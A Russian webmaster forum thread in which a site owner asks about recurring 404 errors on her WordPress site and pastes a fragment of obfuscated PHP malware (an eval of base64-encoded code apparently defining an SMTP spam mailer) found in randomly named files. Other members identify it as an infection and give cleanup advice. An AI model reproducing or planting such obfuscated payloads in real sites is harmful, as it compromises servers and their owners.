WEBLEDI.RUВебледи Форум успешных женщин-вебмастеров
04 Декабрь 2016, 18:16:40 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.

Войти
Правила Реклама

5
10
15
Свежие ответы
Re: Интересные статьи из буржунета (переводы) + Рерайтинг + Копирайтинг от semnat (Контент, копирайтинг, переводы)
Re: Партнерка Vsemayki.ru - 25% с продаж. Отличный конверт 1 к 20 от vsemaykiadmin (CPA-сети)
Re: Занимательные статьи для ваших сайтов от Лизки от Ljuljak (Ищу копирайтера, редактора, контент-менеджера)
Доска объявлений версии 2.2 от Diana101 (Сайты)
Re: Дизайн от новичка от LanaSvetNik (Дизайн)
Онлайн-консультант Jivosite со скидкой до 20% от KeyWebRu (Хостинг)
Создать тест-опрос в Гугл Документах (или ваш вариант) от Anonyff (Работа и услуги)
Re: AdBean - Бобовая тизерная сеть. Новостные и товарные тизеры. До 90% отчислений! от AdBean (Реклама и доход)
Re: Подарю, продам или сдам в аренду домены от June (Домены)
Автоматизация Яндекс Директ + возврат 8% от рекламного бюджета. от Александр_26 (Полезное)
Re: Quick Sender - Комбайн для продвижения в ВКонтакте от Dima_Myrzich (Социальные сети)
Re: Марафон Спарта от Пузата - Почему я иду от Katelite (Обучение сайтостроению, SEO и заработку)
Re: Чистенький женский СДЛ. Размещение в авто от uckpa (Платное размещение статей и ссылок)
Re: [Анонс] Программа для группировки ключевых слов KeyAssort от KeyAssort (Сервисы и SEO программы)
Re: Имеют ли вес покупные ссылки при теперешних правилах Яндекса от Lina7 (Раскрутка сайтов в поисковиках)
Свежие темы
Показать ещё
  Печать  
Страниц: 1
Автор

Тема: WP - Ошибка 404 и странные файлы  (Прочитано 1829 раз)

MechtaZ

в себя верю

Просмотр профиля
« : 17 Декабрь 2015, 23:31:14 »

Первый раз возникла такая странная проблема - после добавления новой записи через несколько часов сайт выдает ошибку 404. При этом главная страница отображается корректно, а вот при открытии записей или категорий - ошибка. Сделаю восстановление - работает. И так примерно раз в сутки.
Вычистила все не нужное, удалила плагины новые, проверила на вирусы и почистила. Ну уже все. Ан нет, проблема повторяется.

Сайт на WP тема Clear Line.

Раньше пользовалась этой темой, нравилось, проблем не возникало. Но потом сайт порушила и даже сравнить не могу. Но мне кажется, что вот таких странных файлов я там не видела:
cszfqoot.php
dmbmibdm.php
dzcm.php
и еще много подобных.

В самих файлах такое, примерно одинаковое, содержание

<?php eval(eval("\$_968e1414c4ac0572fb11d1e122a8ca8dacda4b6d1e177ccbfc911948 = \x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\"DQpzZXRfdGltZV9saW1pdCAoIDY2NjAwMCApOw0KQGlnbm9yZV91c2VyX2Fib3J0ICh0cnVlKTsNCg0KZnVuY3Rpb24gcmFuZG9tX3N0cmluZygkbGVuZ3RoKSB7DQogICAgJGtleSA9ICcnOw0KICAgICRrZXlzID0gcmFuZ2UoJ2EnLCAneicpOw0KDQogICAgZm9yICgkaSA9IDA7ICRpIDwgJGxlbmd0aDsgJGkrKykgew0KICAgICAgICAka2V5IC49ICRrZXlzW2FycmF5X3JhbmQoJGtleXMpXTsNCiAgICB9DQoNCiAgICByZXR1cm4gJGtleTsNCn0NCmRlZmluZSgnQ0ZHX05VTV9TT0NLRVRTJywgNjQpOw0KZGVmaW5lKCdDRkdfU09DS19USU1FT1VUJywgMzApOw0KZGVmaW5lKCdDRkdfU09DS19XT1JLX1RJTUUnLCAxMjApOw0KZGVmaW5lKCdTTVRQX1NUQVRFX1VOREVGJywgMCk7DQpkZWZpbmUoJ1NNVFBfU1RBVEVfQ09OTkVDVCcsIDEpOw0KZGVmaW5lKCdTTVRQX1NUQVRFX0hFTE8nLCAyKTsNCmRlZmluZSgnU01UUF9TVEFURV9NQUlMX0ZST00nLCAzKTsNCmRlZmluZSgnU01UUF9TVEFURV9SQ1BUX1RPJywgNCk7DQpkZWZpbmUoJ1NNVFBfU1RBVEVfREFUQScsIDUpOw0KZGVmaW5lKCdTTVRQX1NUQVRFX0NPTlRFTlQnLCA2KTsNCmRlZmluZSgnU01UUF9TVEFURV9RVUlUJywgNyk7DQpkZWZpbmUoJ1NNVFBfU1RBVFVTX1VOREVGJywgMCk7DQpkZWZpbmUoJ1NNVFBfU1RBVFVTX0xVQ0tZJywgMSk7DQpkZWZpbmUoJ1NNVFBfU1RBVFVTX1VOTFVDS1knLCAyKTsNCmRlZmluZSgnTUFJTF9TVEFUVVNfVU

Что это такое вообще? И что со всем этим делать? В замешательстве

Не теряйте меня до обеда, восполняю бессонные ночи. Сова, однако))
prikhodko_eu

Просмотр профиля
« Ответ #1 : 18 Декабрь 2015, 00:16:09 »

Похоже на вирус. А точно возникает 404 ошибка? Так и написано?

prikhodko_eu

Просмотр профиля
« Ответ #2 : 18 Декабрь 2015, 00:19:33 »

На всякий случай поставьте плагины защиты, которые смогут проверить, если кто-то заходил в админку. Смените пароли. Если есть логин admin - удалите насовсем и замените на другой с паролем в 20 знаков рандомных символов.
Обычно повторение каких-то странных явлений указывает на наличие шелла, при котором автоматически откатывается сайт. У меня такое было. При этом шелл украл все пароли и ходил даже на хостинг в админку. Блокировка по айпи не помогла - заходы и откаты стали производиться с моего айпи. Поэтому пришлось не просто чистить компьютер, а полностью переустанавливать ОС.

MechtaZ

в себя верю

Просмотр профиля
« Ответ #3 : 18 Декабрь 2015, 00:26:29 »

да, так и пишет 404

Если есть логин admin
ага, пароль сменила, а вот логин оставила

плагины защиты
спасибо, попробую

Кстати, вот попробовала удалить всю инфу из одного загадочного файла - на сайте ничего не изменилось. Т.е. на работу они не влияют?

« Последнее редактирование: 18 Декабрь 2015, 00:28:55 от MechtaZ » Записан

prikhodko_eu

Просмотр профиля
« Ответ #4 : 18 Декабрь 2015, 00:39:34 »

MechtaZ, удалите админа совсем, нового сделать - это минутное дело, и логин такой не будет проблем создавать. Многие программы уже заточены под этот логин, и взломать сайт несложно. Ломают же не с домашнего компьютера, а с выделенных серверов, где подобрать его можно в течение дня, если не раньше.
Но  ввашем случае, вероятно, не столько брутфорс, сколько доступ получили к файловой системе, а это значит с помощью шелла добрались до хостинг панели.

prikhodko_eu

Просмотр профиля
« Ответ #5 : 18 Декабрь 2015, 00:41:09 »

MechtaZ, я не знаю, если честно, про файлы. Я не программист. Просто вот был такой опыт с шеллом, вот и делюсь.
Когда поставите защиту, смените тему на всякий случай. Если это бесплатная - в ней дыры могут быть.

MechtaZ

в себя верю

Просмотр профиля
« Ответ #6 : 18 Декабрь 2015, 01:03:21 »

Если это бесплатная
Ну вот никогда такого не было.  В замешательстве
Было, что и левые ссылки удаляла и некоторую зачистку делала. Но вот с этой ошибкой первый раз столкнулась.

Ну вот логин пароль поменяла, все странные файлы удалила (на работу сайта не повлияло, кстати), поставила защиту от несанкционированного входа и мониторинг.
Посмотрим, что это даст Обеспокоенный

prikhodko_eu, спасибо за подсказки дарю цветочек

sputnik1818

Просмотр профиля
« Ответ #7 : 18 Декабрь 2015, 01:16:17 »

У вас вирус на блоге. Если кратко, то в файлы PHP встроен вредоносный зашифрованный код.
Что делать?
Во-первых, поменять логины и пароли администраторов. Я бы ещё сменил пароль почты и включил двухфакторную авторизацию, если выключена.
Во-вторых, поиском через терминал (если есть возможность) выяснил бы какие файлы заражены. Либо можно выкачать сайт и локально поискать по файлам.
В-третьих, закрыть сайт на техобслуживание. И удалить код из файлов вручную. Либо вначале удалить в локальной копии, а потом залить уже готовые файлы. Но сайт лучше прикрыть на это время, чтобы код не распространился - возможно, в нём содержится инфа, которая дописывается в другие файлы PHP.
Лишние подозрительные файлы естественно нужно удалять )

P.S. Чуть не забыл. Обычно этот код вписывает в ваши статьи/может комменты левые спам ссылки. Я бы ещё проверил изменямые под всеми админами статьи за последнее время (HTML код) на предмет левых ссылок

Ну как-то так  пиво
« Последнее редактирование: 18 Декабрь 2015, 01:21:13 от sputnik1818 » Записан

Правила форума
Форум передан новым владельцам:) Контакты их ищите на форуме.
MechtaZ

в себя верю

Просмотр профиля
« Ответ #8 : 18 Декабрь 2015, 01:27:49 »

sputnik1818, пойду застрелюсь пойду дальше ковыряться, спасибо и вам пиво

Сергей Нижегородцев
Умная раскрутка сайтов белыми методами

SEO-аудиты и раскрутка ИМ. Привет, девчонки!

Просмотр профиля WWW
« Ответ #9 : 29 Декабрь 2015, 13:36:48 »

MechtaZ, как успехи в борьбе с вредными скриптами, получилось?

Kimin

Просмотр профиля WWW
« Ответ #10 : 31 Декабрь 2015, 08:11:24 »

Обфусцированные коды - проклятие файлов WP в "бесплатных" красивых темах. Именно поэтому я пишу темы с нуля сам, облегчая сайт до минимума.

Страниц: 1
  Печать  

Перейти в:  

| Sitemap